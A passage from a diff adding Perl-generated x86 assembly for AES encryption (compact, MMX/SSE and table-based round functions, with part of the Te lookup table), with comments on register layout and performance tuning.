+	&mov	("ecx",&DWP(0,$tbl,$acc,8));	#  0
+	&pshufw	("mm2","mm0",0x0d);		#  7, 6, 3, 2
+	&movz	("edx",&HB("eax"));		#  1
+	&mov	("edx",&DWP(3,$tbl,"edx",8));	#  1
+	&shr	("eax",16);			#  5, 4
+
+	&movz	($acc,&LB("ebx"));		# 10
+	&xor	("ecx",&DWP(2,$tbl,$acc,8));	# 10
+	&pshufw	("mm6","mm4",0x08);		# 13,12, 9, 8
+	&movz	($acc,&HB("ebx"));		# 11
+	&xor	("edx",&DWP(1,$tbl,$acc,8));	# 11
+	&shr	("ebx",16);			# 15,14
+
+	&movz	($acc,&HB("eax"));		#  5
+	&xor	("ecx",&DWP(3,$tbl,$acc,8));	#  5
+	&movq	("mm3",QWP(16,$key));
+	&movz	($acc,&HB("ebx"));		# 15
+	&xor	("ecx",&DWP(1,$tbl,$acc,8));	# 15
+	&movd	("mm0","ecx");			# t[0] collected
+
+	&movz	($acc,&LB("eax"));		#  4
+	&mov	("ecx",&DWP(0,$tbl,$acc,8));	#  4
+	&movd	("eax","mm2");			#  7, 6, 3, 2
+	&movz	($acc,&LB("ebx"));		# 14
+	&xor	("ecx",&DWP(2,$tbl,$acc,8));	# 14
+	&movd	("ebx","mm6");			# 13,12, 9, 8
+
+	&movz	($acc,&HB("eax"));		#  3
+	&xor	("ecx",&DWP(1,$tbl,$acc,8));	#  3
+	&movz	($acc,&HB("ebx"));		#  9
+	&xor	("ecx",&DWP(3,$tbl,$acc,8));	#  9
+	&movd	("mm1","ecx");			# t[1] collected
+
+	&movz	($acc,&LB("eax"));		#  2
+	&mov	("ecx",&DWP(2,$tbl,$acc,8));	#  2
+	&shr	("eax",16);			#  7, 6
+	&punpckldq	("mm0","mm1");		# t[0,1] collected
+	&movz	($acc,&LB("ebx"));		#  8
+	&xor	("ecx",&DWP(0,$tbl,$acc,8));	#  8
+	&shr	("ebx",16);			# 13,12
+
+	&movz	($acc,&HB("eax"));		#  7
+	&xor	("ecx",&DWP(1,$tbl,$acc,8));	#  7
+	&pxor	("mm0","mm3");
+	&movz	("eax",&LB("eax"));		#  6
+	&xor	("edx",&DWP(2,$tbl,"eax",8));	#  6
+	&pshufw	("mm1","mm0",0x08);		#  5, 4, 1, 0
+	&movz	($acc,&HB("ebx"));		# 13
+	&xor	("ecx",&DWP(3,$tbl,$acc,8));	# 13
+	&xor	("ecx",&DWP(24,$key));		# t[2]
+	&movd	("mm4","ecx");			# t[2] collected
+	&movz	("ebx",&LB("ebx"));		# 12
+	&xor	("edx",&DWP(0,$tbl,"ebx",8));	# 12
+	&shr	("ecx",16);
+	&movd	("eax","mm1");			#  5, 4, 1, 0
+	&mov	("ebx",&DWP(28,$key));		# t[3]
+	&xor	("ebx","edx");
+	&movd	("mm5","ebx");			# t[3] collected
+	&and	("ebx",0xffff0000);
+	&or	("ebx","ecx");
+
+	&punpckldq	("mm4","mm5");		# t[2,3] collected
+}
+
+######################################################################
+# "Compact" block function
+######################################################################
+
+sub enccompact()
+{ my $Fn = \&mov;
+  while ($#_>5) { pop(@_); $Fn=sub{}; }
+  my ($i,$te,@s)=@_;
+  my $tmp = $key;
+  my $out = $i==3?$s[0]:$acc;
+
+	# $Fn is used in first compact round and its purpose is to
+	# void restoration of some values from stack, so that after
+	# 4xenccompact with extra argument $key value is left there...
+	if ($i==3)  {	&$Fn	($key,$__key);			}##%edx
+	else        {	&mov	($out,$s[0]);			}
+			&and	($out,0xFF);
+	if ($i==1)  {	&shr	($s[0],16);			}#%ebx[1]
+	if ($i==2)  {	&shr	($s[0],24);			}#%ecx[2]
+			&movz	($out,&BP(-128,$te,$out,1));
+
+	if ($i==3)  {	$tmp=$s[1];				}##%eax
+			&movz	($tmp,&HB($s[1]));
+			&movz	($tmp,&BP(-128,$te,$tmp,1));
+			&shl	($tmp,8);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[2]; &mov ($s[1],$__s0);		}##%ebx
+	else        {	&mov	($tmp,$s[2]);
+			&shr	($tmp,16);			}
+	if ($i==2)  {	&and	($s[1],0xFF);			}#%edx[2]
+			&and	($tmp,0xFF);
+			&movz	($tmp,&BP(-128,$te,$tmp,1));
+			&shl	($tmp,16);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[3]; &mov ($s[2],$__s1);		}##%ecx
+	elsif($i==2){	&movz	($tmp,&HB($s[3]));		}#%ebx[2]
+	else        {	&mov	($tmp,$s[3]);
+			&shr	($tmp,24);			}
+			&movz	($tmp,&BP(-128,$te,$tmp,1));
+			&shl	($tmp,24);
+			&xor	($out,$tmp);
+	if ($i<2)   {	&mov	(&DWP(4+4*$i,"esp"),$out);	}
+	if ($i==3)  {	&mov	($s[3],$acc);			}
+	&comment();
+}
+
+sub enctransform()
+{ my @s = ($s0,$s1,$s2,$s3);
+  my $i = shift;
+  my $tmp = $tbl;
+  my $r2  = $key ;
+
+	&and	($tmp,$s[$i]);
+	&lea	($r2,&DWP(0,$s[$i],$s[$i]));
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	&and	($r2,0xfefefefe);
+	&sub	($acc,$tmp);
+	&mov	($tmp,$s[$i]);
+	&and	($acc,0x1b1b1b1b);
+	&rotr	($tmp,16);
+	&xor	($acc,$r2);	# r2
+	&mov	($r2,$s[$i]);
+
+	&xor	($s[$i],$acc);	# r0 ^ r2
+	&rotr	($r2,16+8);
+	&xor	($acc,$tmp);
+	&rotl	($s[$i],24);
+	&xor	($acc,$r2);
+	&mov	($tmp,0x80808080)	if ($i!=1);
+	&xor	($s[$i],$acc);	# ROTATE(r2^r0,24) ^ r2
+}
+
+&function_begin_B("_x86_AES_encrypt_compact");
+	# note that caller is expected to allocate stack frame for me!
+	&mov	($__key,$key);			# save key
+
+	&xor	($s0,&DWP(0,$key));		# xor with key
+	&xor	($s1,&DWP(4,$key));
+	&xor	($s2,&DWP(8,$key));
+	&xor	($s3,&DWP(12,$key));
+
+	&mov	($acc,&DWP(240,$key));		# load key->rounds
+	&lea	($acc,&DWP(-2,$acc,$acc));
+	&lea	($acc,&DWP(0,$key,$acc,8));
+	&mov	($__end,$acc);			# end of key schedule
+
+	# prefetch Te4
+	&mov	($key,&DWP(0-128,$tbl));
+	&mov	($acc,&DWP(32-128,$tbl));
+	&mov	($key,&DWP(64-128,$tbl));
+	&mov	($acc,&DWP(96-128,$tbl));
+	&mov	($key,&DWP(128-128,$tbl));
+	&mov	($acc,&DWP(160-128,$tbl));
+	&mov	($key,&DWP(192-128,$tbl));
+	&mov	($acc,&DWP(224-128,$tbl));
+
+	&set_label("loop",16);
+
+		&enccompact(0,$tbl,$s0,$s1,$s2,$s3,1);
+		&enccompact(1,$tbl,$s1,$s2,$s3,$s0,1);
+		&enccompact(2,$tbl,$s2,$s3,$s0,$s1,1);
+		&enccompact(3,$tbl,$s3,$s0,$s1,$s2,1);
+		&mov	($tbl,0x80808080);
+		&enctransform(2);
+		&enctransform(3);
+		&enctransform(0);
+		&enctransform(1);
+		&mov 	($key,$__key);
+		&mov	($tbl,$__tbl);
+		&add	($key,16);		# advance rd_key
+		&xor	($s0,&DWP(0,$key));
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+	&cmp	($key,$__end);
+	&mov	($__key,$key);
+	&jb	(&label("loop"));
+
+	&enccompact(0,$tbl,$s0,$s1,$s2,$s3);
+	&enccompact(1,$tbl,$s1,$s2,$s3,$s0);
+	&enccompact(2,$tbl,$s2,$s3,$s0,$s1);
+	&enccompact(3,$tbl,$s3,$s0,$s1,$s2);
+
+	&xor	($s0,&DWP(16,$key));
+	&xor	($s1,&DWP(20,$key));
+	&xor	($s2,&DWP(24,$key));
+	&xor	($s3,&DWP(28,$key));
+
+	&ret	();
+&function_end_B("_x86_AES_encrypt_compact");
+
+######################################################################
+# "Compact" SSE block function.
+######################################################################
+#
+# Performance is not actually extraordinary in comparison to pure
+# x86 code. In particular encrypt performance is virtually the same.
+# Decrypt performance on the other hand is 15-20% better on newer
+# µ-archs [but we're thankful for *any* improvement here], and ~50%
+# better on PIII:-) And additionally on the pros side this code
+# eliminates redundant references to stack and thus relieves/
+# minimizes the pressure on the memory bus.
+#
+# MMX register layout                           lsb
+# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
+# |          mm4          |          mm0          |
+# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
+# |     s3    |     s2    |     s1    |     s0    |    
+# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
+# |15|14|13|12|11|10| 9| 8| 7| 6| 5| 4| 3| 2| 1| 0|
+# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
+#
+# Indexes translate as s[N/4]>>(8*(N%4)), e.g. 5 means s1>>8.
+# In this terms encryption and decryption "compact" permutation
+# matrices can be depicted as following:
+#
+# encryption              lsb	# decryption              lsb
+# +----++----+----+----+----+	# +----++----+----+----+----+
+# | t0 || 15 | 10 |  5 |  0 |	# | t0 ||  7 | 10 | 13 |  0 |
+# +----++----+----+----+----+	# +----++----+----+----+----+
+# | t1 ||  3 | 14 |  9 |  4 |	# | t1 || 11 | 14 |  1 |  4 |
+# +----++----+----+----+----+	# +----++----+----+----+----+
+# | t2 ||  7 |  2 | 13 |  8 |	# | t2 || 15 |  2 |  5 |  8 |
+# +----++----+----+----+----+	# +----++----+----+----+----+
+# | t3 || 11 |  6 |  1 | 12 |	# | t3 ||  3 |  6 |  9 | 12 |
+# +----++----+----+----+----+	# +----++----+----+----+----+
+#
+######################################################################
+# Why not xmm registers? Short answer. It was actually tested and
+# was not any faster, but *contrary*, most notably on Intel CPUs.
+# Longer answer. Main advantage of using mm registers is that movd
+# latency is lower, especially on Intel P4. While arithmetic
+# instructions are twice as many, they can be scheduled every cycle
+# and not every second one when they are operating on xmm register,
+# so that "arithmetic throughput" remains virtually the same. And
+# finally the code can be executed even on elder SSE-only CPUs:-)
+
+sub sse_enccompact()
+{
+	&pshufw	("mm1","mm0",0x08);		#  5, 4, 1, 0
+	&pshufw	("mm5","mm4",0x0d);		# 15,14,11,10
+	&movd	("eax","mm1");			#  5, 4, 1, 0
+	&movd	("ebx","mm5");			# 15,14,11,10
+	&mov	($__key,$key);
+
+	&movz	($acc,&LB("eax"));		#  0
+	&movz	("edx",&HB("eax"));		#  1
+	&pshufw	("mm2","mm0",0x0d);		#  7, 6, 3, 2
+	&movz	("ecx",&BP(-128,$tbl,$acc,1));	#  0
+	&movz	($key,&LB("ebx"));		# 10
+	&movz	("edx",&BP(-128,$tbl,"edx",1));	#  1
+	&shr	("eax",16);			#  5, 4
+	&shl	("edx",8);			#  1
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 10
+	&movz	($key,&HB("ebx"));		# 11
+	&shl	($acc,16);			# 10
+	&pshufw	("mm6","mm4",0x08);		# 13,12, 9, 8
+	&or	("ecx",$acc);			# 10
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 11
+	&movz	($key,&HB("eax"));		#  5
+	&shl	($acc,24);			# 11
+	&shr	("ebx",16);			# 15,14
+	&or	("edx",$acc);			# 11
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  5
+	&movz	($key,&HB("ebx"));		# 15
+	&shl	($acc,8);			#  5
+	&or	("ecx",$acc);			#  5
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 15
+	&movz	($key,&LB("eax"));		#  4
+	&shl	($acc,24);			# 15
+	&or	("ecx",$acc);			# 15
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  4
+	&movz	($key,&LB("ebx"));		# 14
+	&movd	("eax","mm2");			#  7, 6, 3, 2
+	&movd	("mm0","ecx");			# t[0] collected
+	&movz	("ecx",&BP(-128,$tbl,$key,1));	# 14
+	&movz	($key,&HB("eax"));		#  3
+	&shl	("ecx",16);			# 14
+	&movd	("ebx","mm6");			# 13,12, 9, 8
+	&or	("ecx",$acc);			# 14
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  3
+	&movz	($key,&HB("ebx"));		#  9
+	&shl	($acc,24);			#  3
+	&or	("ecx",$acc);			#  3
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  9
+	&movz	($key,&LB("ebx"));		#  8
+	&shl	($acc,8);			#  9
+	&shr	("ebx",16);			# 13,12
+	&or	("ecx",$acc);			#  9
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  8
+	&movz	($key,&LB("eax"));		#  2
+	&shr	("eax",16);			#  7, 6
+	&movd	("mm1","ecx");			# t[1] collected
+	&movz	("ecx",&BP(-128,$tbl,$key,1));	#  2
+	&movz	($key,&HB("eax"));		#  7
+	&shl	("ecx",16);			#  2
+	&and	("eax",0xff);			#  6
+	&or	("ecx",$acc);			#  2
+
+	&punpckldq	("mm0","mm1");		# t[0,1] collected
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  7
+	&movz	($key,&HB("ebx"));		# 13
+	&shl	($acc,24);			#  7
+	&and	("ebx",0xff);			# 12
+	&movz	("eax",&BP(-128,$tbl,"eax",1));	#  6
+	&or	("ecx",$acc);			#  7
+	&shl	("eax",16);			#  6
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 13
+	&or	("edx","eax");			#  6
+	&shl	($acc,8);			# 13
+	&movz	("ebx",&BP(-128,$tbl,"ebx",1));	# 12
+	&or	("ecx",$acc);			# 13
+	&or	("edx","ebx");			# 12
+	&mov	($key,$__key);
+	&movd	("mm4","ecx");			# t[2] collected
+	&movd	("mm5","edx");			# t[3] collected
+
+	&punpckldq	("mm4","mm5");		# t[2,3] collected
+}
+
+					if (!$x86only) {
+&function_begin_B("_sse_AES_encrypt_compact");
+	&pxor	("mm0",&QWP(0,$key));	#  7, 6, 5, 4, 3, 2, 1, 0
+	&pxor	("mm4",&QWP(8,$key));	# 15,14,13,12,11,10, 9, 8
+
+	# note that caller is expected to allocate stack frame for me!
+	&mov	($acc,&DWP(240,$key));		# load key->rounds
+	&lea	($acc,&DWP(-2,$acc,$acc));
+	&lea	($acc,&DWP(0,$key,$acc,8));
+	&mov	($__end,$acc);			# end of key schedule
+
+	&mov	($s0,0x1b1b1b1b);		# magic constant
+	&mov	(&DWP(8,"esp"),$s0);
+	&mov	(&DWP(12,"esp"),$s0);
+
+	# prefetch Te4
+	&mov	($s0,&DWP(0-128,$tbl));
+	&mov	($s1,&DWP(32-128,$tbl));
+	&mov	($s2,&DWP(64-128,$tbl));
+	&mov	($s3,&DWP(96-128,$tbl));
+	&mov	($s0,&DWP(128-128,$tbl));
+	&mov	($s1,&DWP(160-128,$tbl));
+	&mov	($s2,&DWP(192-128,$tbl));
+	&mov	($s3,&DWP(224-128,$tbl));
+
+	&set_label("loop",16);
+		&sse_enccompact();
+		&add	($key,16);
+		&cmp	($key,$__end);
+		&ja	(&label("out"));
+
+		&movq	("mm2",&QWP(8,"esp"));
+		&pxor	("mm3","mm3");		&pxor	("mm7","mm7");
+		&movq	("mm1","mm0");		&movq	("mm5","mm4");	# r0
+		&pcmpgtb("mm3","mm0");		&pcmpgtb("mm7","mm4");
+		&pand	("mm3","mm2");		&pand	("mm7","mm2");
+		&pshufw	("mm2","mm0",0xb1);	&pshufw	("mm6","mm4",0xb1);# ROTATE(r0,16)
+		&paddb	("mm0","mm0");		&paddb	("mm4","mm4");
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# = r2
+		&pshufw	("mm3","mm2",0xb1);	&pshufw	("mm7","mm6",0xb1);# r0
+		&pxor	("mm1","mm0");		&pxor	("mm5","mm4");	# r0^r2
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");	# ^= ROTATE(r0,16)
+
+		&movq	("mm2","mm3");		&movq	("mm6","mm7");
+		&pslld	("mm3",8);		&pslld	("mm7",8);
+		&psrld	("mm2",24);		&psrld	("mm6",24);
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= r0<<8
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");	# ^= r0>>24
+
+		&movq	("mm3","mm1");		&movq	("mm7","mm5");
+		&movq	("mm2",&QWP(0,$key));	&movq	("mm6",&QWP(8,$key));
+		&psrld	("mm1",8);		&psrld	("mm5",8);
+		&mov	($s0,&DWP(0-128,$tbl));
+		&pslld	("mm3",24);		&pslld	("mm7",24);
+		&mov	($s1,&DWP(64-128,$tbl));
+		&pxor	("mm0","mm1");		&pxor	("mm4","mm5");	# ^= (r2^r0)<<8
+		&mov	($s2,&DWP(128-128,$tbl));
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= (r2^r0)>>24
+		&mov	($s3,&DWP(192-128,$tbl));
+
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");
+	&jmp	(&label("loop"));
+
+	&set_label("out",16);
+	&pxor	("mm0",&QWP(0,$key));
+	&pxor	("mm4",&QWP(8,$key));
+
+	&ret	();
+&function_end_B("_sse_AES_encrypt_compact");
+					}
+
+######################################################################
+# Vanilla block function.
+######################################################################
+
+sub encstep()
+{ my ($i,$te,@s) = @_;
+  my $tmp = $key;
+  my $out = $i==3?$s[0]:$acc;
+
+	# lines marked with #%e?x[i] denote "reordered" instructions...
+	if ($i==3)  {	&mov	($key,$__key);			}##%edx
+	else        {	&mov	($out,$s[0]);
+			&and	($out,0xFF);			}
+	if ($i==1)  {	&shr	($s[0],16);			}#%ebx[1]
+	if ($i==2)  {	&shr	($s[0],24);			}#%ecx[2]
+			&mov	($out,&DWP(0,$te,$out,8));
+
+	if ($i==3)  {	$tmp=$s[1];				}##%eax
+			&movz	($tmp,&HB($s[1]));
+			&xor	($out,&DWP(3,$te,$tmp,8));
+
+	if ($i==3)  {	$tmp=$s[2]; &mov ($s[1],$__s0);		}##%ebx
+	else        {	&mov	($tmp,$s[2]);
+			&shr	($tmp,16);			}
+	if ($i==2)  {	&and	($s[1],0xFF);			}#%edx[2]
+			&and	($tmp,0xFF);
+			&xor	($out,&DWP(2,$te,$tmp,8));
+
+	if ($i==3)  {	$tmp=$s[3]; &mov ($s[2],$__s1);		}##%ecx
+	elsif($i==2){	&movz	($tmp,&HB($s[3]));		}#%ebx[2]
+	else        {	&mov	($tmp,$s[3]); 
+			&shr	($tmp,24)			}
+			&xor	($out,&DWP(1,$te,$tmp,8));
+	if ($i<2)   {	&mov	(&DWP(4+4*$i,"esp"),$out);	}
+	if ($i==3)  {	&mov	($s[3],$acc);			}
+			&comment();
+}
+
+sub enclast()
+{ my ($i,$te,@s)=@_;
+  my $tmp = $key;
+  my $out = $i==3?$s[0]:$acc;
+
+	if ($i==3)  {	&mov	($key,$__key);			}##%edx
+	else        {	&mov	($out,$s[0]);			}
+			&and	($out,0xFF);
+	if ($i==1)  {	&shr	($s[0],16);			}#%ebx[1]
+	if ($i==2)  {	&shr	($s[0],24);			}#%ecx[2]
+			&mov	($out,&DWP(2,$te,$out,8));
+			&and	($out,0x000000ff);
+
+	if ($i==3)  {	$tmp=$s[1];				}##%eax
+			&movz	($tmp,&HB($s[1]));
+			&mov	($tmp,&DWP(0,$te,$tmp,8));
+			&and	($tmp,0x0000ff00);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[2]; &mov ($s[1],$__s0);		}##%ebx
+	else        {	&mov	($tmp,$s[2]);
+			&shr	($tmp,16);			}
+	if ($i==2)  {	&and	($s[1],0xFF);			}#%edx[2]
+			&and	($tmp,0xFF);
+			&mov	($tmp,&DWP(0,$te,$tmp,8));
+			&and	($tmp,0x00ff0000);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[3]; &mov ($s[2],$__s1);		}##%ecx
+	elsif($i==2){	&movz	($tmp,&HB($s[3]));		}#%ebx[2]
+	else        {	&mov	($tmp,$s[3]);
+			&shr	($tmp,24);			}
+			&mov	($tmp,&DWP(2,$te,$tmp,8));
+			&and	($tmp,0xff000000);
+			&xor	($out,$tmp);
+	if ($i<2)   {	&mov	(&DWP(4+4*$i,"esp"),$out);	}
+	if ($i==3)  {	&mov	($s[3],$acc);			}
+}
+
+&function_begin_B("_x86_AES_encrypt");
+	if ($vertical_spin) {
+		# I need high parts of volatile registers to be accessible...
+		&exch	($s1="edi",$key="ebx");
+		&mov	($s2="esi",$acc="ecx");
+	}
+
+	# note that caller is expected to allocate stack frame for me!
+	&mov	($__key,$key);			# save key
+
+	&xor	($s0,&DWP(0,$key));		# xor with key
+	&xor	($s1,&DWP(4,$key));
+	&xor	($s2,&DWP(8,$key));
+	&xor	($s3,&DWP(12,$key));
+
+	&mov	($acc,&DWP(240,$key));		# load key->rounds
+
+	if ($small_footprint) {
+	    &lea	($acc,&DWP(-2,$acc,$acc));
+	    &lea	($acc,&DWP(0,$key,$acc,8));
+	    &mov	($__end,$acc);		# end of key schedule
+
+	    &set_label("loop",16);
+		if ($vertical_spin) {
+		    &encvert($tbl,$s0,$s1,$s2,$s3);
+		} else {
+		    &encstep(0,$tbl,$s0,$s1,$s2,$s3);
+		    &encstep(1,$tbl,$s1,$s2,$s3,$s0);
+		    &encstep(2,$tbl,$s2,$s3,$s0,$s1);
+		    &encstep(3,$tbl,$s3,$s0,$s1,$s2);
+		}
+		&add	($key,16);		# advance rd_key
+		&xor	($s0,&DWP(0,$key));
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+	    &cmp	($key,$__end);
+	    &mov	($__key,$key);
+	    &jb		(&label("loop"));
+	}
+	else {
+	    &cmp	($acc,10);
+	    &jle	(&label("10rounds"));
+	    &cmp	($acc,12);
+	    &jle	(&label("12rounds"));
+
+	&set_label("14rounds",4);
+	    for ($i=1;$i<3;$i++) {
+		if ($vertical_spin) {
+		    &encvert($tbl,$s0,$s1,$s2,$s3);
+		} else {
+		    &encstep(0,$tbl,$s0,$s1,$s2,$s3);
+		    &encstep(1,$tbl,$s1,$s2,$s3,$s0);
+		    &encstep(2,$tbl,$s2,$s3,$s0,$s1);
+		    &encstep(3,$tbl,$s3,$s0,$s1,$s2);
+		}
+		&xor	($s0,&DWP(16*$i+0,$key));
+		&xor	($s1,&DWP(16*$i+4,$key));
+		&xor	($s2,&DWP(16*$i+8,$key));
+		&xor	($s3,&DWP(16*$i+12,$key));
+	    }
+	    &add	($key,32);
+	    &mov	($__key,$key);		# advance rd_key
+	&set_label("12rounds",4);
+	    for ($i=1;$i<3;$i++) {
+		if ($vertical_spin) {
+		    &encvert($tbl,$s0,$s1,$s2,$s3);
+		} else {
+		    &encstep(0,$tbl,$s0,$s1,$s2,$s3);
+		    &encstep(1,$tbl,$s1,$s2,$s3,$s0);
+		    &encstep(2,$tbl,$s2,$s3,$s0,$s1);
+		    &encstep(3,$tbl,$s3,$s0,$s1,$s2);
+		}
+		&xor	($s0,&DWP(16*$i+0,$key));
+		&xor	($s1,&DWP(16*$i+4,$key));
+		&xor	($s2,&DWP(16*$i+8,$key));
+		&xor	($s3,&DWP(16*$i+12,$key));
+	    }
+	    &add	($key,32);
+	    &mov	($__key,$key);		# advance rd_key
+	&set_label("10rounds",4);
+	    for ($i=1;$i<10;$i++) {
+		if ($vertical_spin) {
+		    &encvert($tbl,$s0,$s1,$s2,$s3);
+		} else {
+		    &encstep(0,$tbl,$s0,$s1,$s2,$s3);
+		    &encstep(1,$tbl,$s1,$s2,$s3,$s0);
+		    &encstep(2,$tbl,$s2,$s3,$s0,$s1);
+		    &encstep(3,$tbl,$s3,$s0,$s1,$s2);
+		}
+		&xor	($s0,&DWP(16*$i+0,$key));
+		&xor	($s1,&DWP(16*$i+4,$key));
+		&xor	($s2,&DWP(16*$i+8,$key));
+		&xor	($s3,&DWP(16*$i+12,$key));
+	    }
+	}
+
+	if ($vertical_spin) {
+	    # "reincarnate" some registers for "horizontal" spin...
+	    &mov	($s1="ebx",$key="edi");
+	    &mov	($s2="ecx",$acc="esi");
+	}
+	&enclast(0,$tbl,$s0,$s1,$s2,$s3);
+	&enclast(1,$tbl,$s1,$s2,$s3,$s0);
+	&enclast(2,$tbl,$s2,$s3,$s0,$s1);
+	&enclast(3,$tbl,$s3,$s0,$s1,$s2);
+
+	&add	($key,$small_footprint?16:160);
+	&xor	($s0,&DWP(0,$key));
+	&xor	($s1,&DWP(4,$key));
+	&xor	($s2,&DWP(8,$key));
+	&xor	($s3,&DWP(12,$key));
+
+	&ret	();
+
+&set_label("AES_Te",64);	# Yes! I keep it in the code segment!
+	&_data_word(0xa56363c6, 0x847c7cf8, 0x997777ee, 0x8d7b7bf6);
+	&_data_word(0x0df2f2ff, 0xbd6b6bd6, 0xb16f6fde, 0x54c5c591);
+	&_data_word(0x50303060, 0x03010102, 0xa96767ce, 0x7d2b2b56);
+	&_data_word(0x19fefee7, 0x62d7d7b5, 0xe6abab4d, 0x9a7676ec);
+	&_data_word(0x45caca8f, 0x9d82821f, 0x40c9c989, 0x877d7dfa);
+	&_data_word(0x15fafaef, 0xeb5959b2, 0xc947478e, 0x0bf0f0fb);
+	&_data_word(0xecadad41, 0x67d4d4b3, 0xfda2a25f, 0xeaafaf45);
+	&_data_word(0xbf9c9c23, 0xf7a4a453, 0x967272e4, 0x5bc0c09b);
+	&_data_word(0xc2b7b775, 0x1cfdfde1, 0xae93933d, 0x6a26264c);
+	&_data_word(0x5a36366c, 0x413f3f7e, 0x02f7f7f5, 0x4fcccc83);
+	&_data_word(0x5c343468, 0xf4a5a551, 0x34e5e5d1, 0x08f1f1f9);
+	&_data_word(0x937171e2, 0x73d8d8ab, 0x53313162, 0x3f15152a);
+	&_data_word(0x0c040408, 0x52c7c795, 0x65232346, 0x5ec3c39d);
+	&_data_word(0x28181830, 0xa1969637, 0x0f05050a, 0xb59a9a2f);
+	&_data_word(0x0907070e, 0x36121224, 0x9b80801b, 0x3de2e2df);
+	&_data_word(0x26ebebcd, 0x6927274e, 0xcdb2b27f, 0x9f7575ea);
+	&_data_word(0x1b090912, 0x9e83831d, 0x742c2c58, 0x2e1a1a34);
+	&_data_word(0x2d1b1b36, 0xb26e6edc, 0xee5a5ab4, 0xfba0a05b);
+	&_data_word(0xf65252a4, 0x4d3b3b76, 0x61d6d6b7, 0xceb3b37d);
+	&_data_word(0x7b292952, 0x3ee3e3dd, 0x712f2f5e, 0x97848413);
+	&_data_word(0xf55353a6, 0x68d1d1b9, 0x00000000, 0x2cededc1);
+	&_data_word(0x60202040, 0x1ffcfce3, 0xc8b1b179, 0xed5b5bb6);
+	&_data_word(0xbe6a6ad4, 0x46cbcb8d, 0xd9bebe67, 0x4b393972);
+	&_data_word(0xde4a4a94, 0xd44c4c98, 0xe85858b0, 0x4acfcf85);
+	&_data_word(0x6bd0d0bb, 0x2aefefc5, 0xe5aaaa4f, 0x16fbfbed);
+	&_data_word(0xc5434386, 0xd74d4d9a, 0x55333366, 0x94858511);
+	&_data_word(0xcf45458a, 0x10f9f9e9, 0x06020204, 0x817f7ffe);
+	&_data_word(0xf05050a0, 0x443c3c78, 0xba9f9f25, 0xe3a8a84b);
+	&_data_word(0xf35151a2, 0xfea3a35d, 0xc0404080, 0x8a8f8f05);
+	&_data_word(0xad92923f, 0xbc9d9d21, 0x48383870, 0x04f5f5f1);
+	&_data_word(0xdfbcbc63, 0xc1b6b677, 0x75dadaaf, 0x63212142);
+	&_data_word(0x30101020, 0x1affffe5, 0x0ef3f3fd, 0x6dd2d2bf);
+	&_data_word(0x4ccdcd81, 0x140c0c18, 0x35131326, 0x2fececc3);
+	&_data_word(0xe15f5fbe, 0xa2979735, 0xcc444488, 0x3917172e);
+	&_data_word(0x57c4c493, 0xf2a7a755, 0x827e7efc, 0x473d3d7a);
+	&_data_word(0xac6464c8, 0xe75d5dba, 0x2b191932, 0x957373e6);
+	&_data_word(0xa06060c0, 0x98818119, 0xd14f4f9e, 0x7fdcdca3);
+	&_data_word(0x66222244, 0x7e2a2a54, 0xab90903b, 0x8388880b);
+	&_data_word(0xca46468c, 0x29eeeec7, 0xd3b8b86b, 0x3c141428);
+	&_data_word(0x79dedea7, 0xe25e5ebc, 0x1d0b0b16, 0x76dbdbad);
+	&_data_word(0x3be0e0db, 0x56323264, 0x4e3a3a74, 0x1e0a0a14);
+	&_data_word(0xdb494992, 0x0a06060c, 0x6c242448, 0xe45c5cb8);
+	&_data_word(0x5dc2c29f, 0x6ed3d3bd, 0xefacac43, 0xa66262c4);
+	&_data_word(0xa8919139, 0xa4959531, 0x37e4e4d3, 0x8b7979f2);
+	&_data_word(0x32e7e7d5, 0x43c8c88b, 0x5937376e, 0xb76d6dda);
+	&_data_word(0x8c8d8d01, 0x64d5d5b1, 0xd24e4e9c, 0xe0a9a949);
+	&_data_word(0xb46c6cd8, 0xfa5656ac, 0x07f4f4f3, 0x25eaeacf);
+	&_data_word(0xaf6565ca, 0x8e7a7af4, 0xe9aeae47, 0x18080810);
+	&_data_word(0xd5baba6f, 0x887878f0, 0x6f25254a, 0x722e2e5c);
+	&_data_word(0x241c1c38, 0xf1a6a657, 0xc7b4b473, 0x51c6c697);
+	&_data_word(0x23e8e8cb, 0x7cdddda1, 0x9c7474e8, 0x211f1f3e);
+	&_data_word(0xdd4b4b96, 0xdcbdbd61, 0x868b8b0d, 0x858a8a0f);
+	&_data_word(0x907070e0, 0x423e3e7c, 0xc4b5b571, 0xaa6666cc);
+	&_data_word(0xd8484890, 0x05030306, 0x01f6f6f7, 0x120e0e1c);
+	&_data_word(0xa36161c2, 0x5f35356a, 0xf95757ae, 0xd0b9b969);
+	&_data_word(0x91868617, 0x58c1c199, 0x271d1d3a, 0xb99e9e27);
+	&_data_word(0x38e1e1d9, 0x13f8f8eb, 0xb398982b, 0x33111122);
